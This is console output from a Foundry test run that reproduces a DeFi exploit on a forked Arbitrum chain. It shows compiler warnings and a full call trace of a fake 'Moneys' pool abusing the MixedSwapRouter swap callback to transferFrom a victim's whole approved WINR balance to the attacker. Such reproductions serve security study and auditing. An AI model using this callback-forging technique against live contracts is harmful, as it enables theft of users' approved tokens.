Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 917.07ms
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:171:9:
    |
171 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/2024-05/MixedSwapRouter_exp.sol:148:5:
    |
148 |     event data(bytes data);
    |     ^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-05/MixedSwapRouter_exp.sol:92:1:
   |
92 | contract Exploit is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:137:5:
    |
137 |     fallback() external payable {}
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (6321): Unnamed return variable can remain unassigned. Add an explicit return with value to all non-reverting code paths or name the variable.
  --> src/test/2024-05/MixedSwapRouter_exp.sol:71:25:
   |
71 |     ) internal returns (address) {
   |                         ^^^^^^^

Warning (6321): Unnamed return variable can remain unassigned. Add an explicit return with value to all non-reverting code paths or name the variable.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:119:25:
    |
119 |     ) internal returns (address) {
    |                         ^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2024-05/MixedSwapRouter_exp.sol:55:9:
   |
55 |         address one = create_contract(1);
   |         ^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:167:9:
    |
167 |         address recipient,
    |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:168:9:
    |
168 |         bool zeroForOne,
    |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:169:9:
    |
169 |         int256 amountSpecified,
    |         ^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:170:9:
    |
170 |         uint160 sqrtPriceLimitX96,
    |         ^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-05/MixedSwapRouter_exp.sol:171:9:
    |
171 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2024-05/MixedSwapRouter_exp.sol:58:5:
   |
58 |     function cal_address(
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
   --> src/test/2024-05/MixedSwapRouter_exp.sol:154:5:
    |
154 |     function fee() public returns (uint256) {
    |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to view
   --> src/test/2024-05/MixedSwapRouter_exp.sol:158:5:
    |
158 |     function token0() public returns (address) {
    |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to view
   --> src/test/2024-05/MixedSwapRouter_exp.sol:162:5:
    |
162 |     function token1() public returns (address) {
    |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 492.94ms (4.10ms CPU time)

Ran 1 test for src/test/2024-05/MixedSwapRouter_exp.sol:ContractTest
[PASS] testExploit() (gas: 3456030)
Logs:
  Vicitm WINR balance before exploit: 293182.421809175367609122
  Attacker WINR balance before exploit: 0.000000000000000000
  Vicitm WINR balance after exploit: 0.000000000000000000
  Attacker WINR balance after exploit: 293182.421809175367609122

Traces:
  [5830] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("arbitrum", 216881055 [2.168e8])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [3483530] ContractTest::testExploit()
    ├─ [3393266] → new Exploit@0x5A71D82D7936238Aa29eC3b9d6D7AcB508A4c0eF
    │   ├─ [1999479] → new Moneys@0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 34: 0 → 0x000000000000000000000000e3e98241cb99af7a452e94b9cf219aaa766e0869
    │   │   │   @ 35: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 32: 0 → 0x0000000000000000000000005a71d82d7936238aa29ec3b9d6d7acb508a4c0ef
    │   │   │   @ 31: 0 → 0x0000000000000000000000d77b108d4f6cefaa0cae9506a934e825becca46e01
    │   │   │   @ 33: 0 → 0x000000000000000000000000b6d566c4d645ab640fc6ac362f233dcfb5621f7c
    │   │   └─ ← [Return] 9321 bytes of code
    │   ├─ [122329] 0xE3E98241CB99AF7a452e94B9cf219aAa766e0869::swapTokensForTokens(ExactInputParams({ path: 0xd77b108d4f6cefaa0cae9506a934e825becca46e000000d77b108d4f6cefaa0cae9506a934e825becca46e, recipient: 0x5A71D82D7936238Aa29eC3b9d6D7AcB508A4c0eF, deadline: 1717145303 [1.717e9], amountIn: 10, amountOutMin: 10, pool: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c] }))
    │   │   ├─ [117376] 0x58637AAAC44e2A2F190D9e1976E236d86D691542::swapTokensForTokens(ExactInputParams({ path: 0xd77b108d4f6cefaa0cae9506a934e825becca46e000000d77b108d4f6cefaa0cae9506a934e825becca46e, recipient: 0x5A71D82D7936238Aa29eC3b9d6D7AcB508A4c0eF, deadline: 1717145303 [1.717e9], amountIn: 10, amountOutMin: 10, pool: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c] })) [delegatecall]
    │   │   │   ├─ [375] Moneys::fee() [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [590] Moneys::token0() [staticcall]
    │   │   │   │   └─ ← [Return] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E
    │   │   │   ├─ [588] Moneys::token1() [staticcall]
    │   │   │   │   └─ ← [Return] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E
    │   │   │   ├─ [98898] Moneys::swap(Exploit: [0x5A71D82D7936238Aa29eC3b9d6D7AcB508A4c0eF], false, 10, 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000600000000000000000000000005a71d82d7936238aa29ec3b9d6d7acb508a4c0ef00000000000000000000000013e6b4e3e432f3e057f96dee3a70a821b60fd92c000000000000000000000000000000000000000000000000000000000000002bd77b108d4f6cefaa0cae9506a934e825becca46e000000d77b108d4f6cefaa0cae9506a934e825becca46e000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [2584] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E::balanceOf(0xb6d566c4d645ab640fc6Ac362f233dCFB5621f7C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 293182421809175367609122 [2.931e23]
    │   │   │   │   ├─ emit log_named_decimal_uint(key: "Vicitm WINR balance before exploit", val: 293182421809175367609122 [2.931e23], decimals: 18)
    │   │   │   │   ├─ [2584] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E::balanceOf(Moneys: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ emit log_named_decimal_uint(key: "Attacker WINR balance before exploit", val: 0, decimals: 18)
    │   │   │   │   ├─ [42455] 0xE3E98241CB99AF7a452e94B9cf219aAa766e0869::algebraSwapCallback(-20057735863910611438 [-2.005e19], 293182421809175367609122 [2.931e23], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000060000000000000000000000000b6d566c4d645ab640fc6ac362f233dcfb5621f7c00000000000000000000000013e6b4e3e432f3e057f96dee3a70a821b60fd92c000000000000000000000000000000000000000000000000000000000000002bd77b108d4f6cefaa0cae9506a934e825becca46e000000d77b108d4f6cefaa0cae9506a934e825becca46e000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [42008] 0x58637AAAC44e2A2F190D9e1976E236d86D691542::algebraSwapCallback(-20057735863910611438 [-2.005e19], 293182421809175367609122 [2.931e23], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000060000000000000000000000000b6d566c4d645ab640fc6ac362f233dcfb5621f7c00000000000000000000000013e6b4e3e432f3e057f96dee3a70a821b60fd92c000000000000000000000000000000000000000000000000000000000000002bd77b108d4f6cefaa0cae9506a934e825becca46e000000d77b108d4f6cefaa0cae9506a934e825becca46e000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   │   ├─ [590] Moneys::token0() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E
    │   │   │   │   │   │   ├─ [588] Moneys::token1() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E
    │   │   │   │   │   │   ├─ [33142] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E::transferFrom(0xb6d566c4d645ab640fc6Ac362f233dCFB5621f7C, Moneys: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c], 293182421809175367609122 [2.931e23])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0xb6d566c4d645ab640fc6Ac362f233dCFB5621f7C, spender: 0xE3E98241CB99AF7a452e94B9cf219aAa766e0869, value: 706817578190824632390878 [7.068e23])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xb6d566c4d645ab640fc6Ac362f233dCFB5621f7C, to: Moneys: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c], value: 293182421809175367609122 [2.931e23])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x3008c1e80119bc9bd0a4f13c14c2c3c4b8900c0a23792553561bf6899e616802: 0x000000000000000000000000000000000000000000003e15737058669b016b22 → 0
    │   │   │   │   │   │   │   │   @ 0xa583628aa20135d047556ef36b8d6bd9db3ab77ea97b2bbf151360110ac2e8be: 0 → 0x000000000000000000000000000000000000000000003e15737058669b016b22
    │   │   │   │   │   │   │   │   @ 0x935c5e2bc3454e2c7906e43850f72136c5db3b086252e52824d0bb3e6928d63e: 0x00000000000000000000000000000000000000000000d3c21bcecceda1000000 → 0x0000000000000000000000000000000000000000000095aca85e748705fe94de
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [584] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E::balanceOf(0xb6d566c4d645ab640fc6Ac362f233dCFB5621f7C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ emit log_named_decimal_uint(key: "Vicitm WINR balance after exploit", val: 0, decimals: 18)
    │   │   │   │   ├─ [584] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E::balanceOf(Moneys: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 293182421809175367609122 [2.931e23]
    │   │   │   │   ├─ emit log_named_decimal_uint(key: "Attacker WINR balance after exploit", val: 293182421809175367609122 [2.931e23], decimals: 18)
    │   │   │   │   ├─ [584] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E::balanceOf(Moneys: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 293182421809175367609122 [2.931e23]
    │   │   │   │   ├─ [24942] 0xD77B108d4f6cefaa0Cae9506A934e825BEccA46E::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 293182421809175367609122 [2.931e23])
    │   │   │   │   │   ├─ emit Transfer(from: Moneys: [0x13E6B4E3E432f3E057F96dEe3A70a821B60fD92c], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 293182421809175367609122 [2.931e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa583628aa20135d047556ef36b8d6bd9db3ab77ea97b2bbf151360110ac2e8be: 0x000000000000000000000000000000000000000000003e15737058669b016b22 → 0
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000003e15737058669b016b22
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa583628aa20135d047556ef36b8d6bd9db3ab77ea97b2bbf151360110ac2e8be: 0 → 0x000000000000000000000000000000000000000000003e15737058669b016b22
    │   │   │   │   └─ ← [Return] 10, 10
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Return]
    │   ├─  storage changes:
    │   │   @ 33: 0 → 0x000000000000000000000000e3e98241cb99af7a452e94b9cf219aaa766e0869
    │   │   @ 31: 0 → 0x0000000000000000000000d77b108d4f6cefaa0cae9506a934e825becca46e01
    │   │   @ 12: 0 → 1
    │   │   @ 32: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   └─ ← [Return] 5559 bytes of code
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.23s (4.76s CPU time)

Ran 2 test suites in 7.15s (6.72s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
